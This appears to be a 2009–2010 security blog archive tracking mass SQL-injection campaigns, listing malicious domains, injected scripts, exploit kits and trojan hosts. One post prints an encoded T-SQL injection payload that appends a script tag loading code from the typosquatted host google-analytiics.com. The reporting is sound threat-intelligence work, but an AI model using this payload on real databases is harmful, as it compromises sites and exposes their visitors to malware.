nutcountry.ru

Posted in sql injection on August 2, 2010 by s3cu

sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13

the domain is currently not resolvable.

google-analytiics.com

Posted in sql injection on January 15, 2010 by s3cu

Notice the 2 ‘i’ in the domain?

The sql-injection attack comes in the form


set+variable=cast(variable+as+varchar(8000))%2Bcast(

char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))

Continue reading

z360.net/a.js

Posted in sql injection on September 2, 2009 by s3cu

this injected script also has several associated domains

  • dd45h.8866.org/fkzd/16.htm
  • wm.1kfie.cn/x150/xx.html

One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]

k.18xn.com/x.js

Posted in sql injection on September 1, 2009 by s3cu

active sql-injection attack.

Injected scripts and exploits iframe to several urls such as:

the scripts generate some form of ‘time-based’ parameters that probably is only available for a brief period.

The trojan downloader from http://www.haerh.info get a list of evil programs from http://www.gehae.info/2.txt

a0v.org/x.js

Posted in sql injection on July 23, 2009 by s3cu

another round of sql-injection attacks.

x.js calls iframe src http://www.jejsaj.com/ya/index.html

jejsaj contains various exploits targeting among others

  • owc 0-day
  • realplayer
  • msvidctl.dll

the exploits download trojans from http://www.wowand.com

f1y.in/j.js

Posted in sql injection on July 11, 2009 by s3cu

another round of sql-injection attempt

Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811

218.213.77.96/a.js

Posted in sql injection on May 28, 2009 by s3cu

a recent round of sql-injected link.
Continue reading

Follow

Get every new post delivered to your Inbox.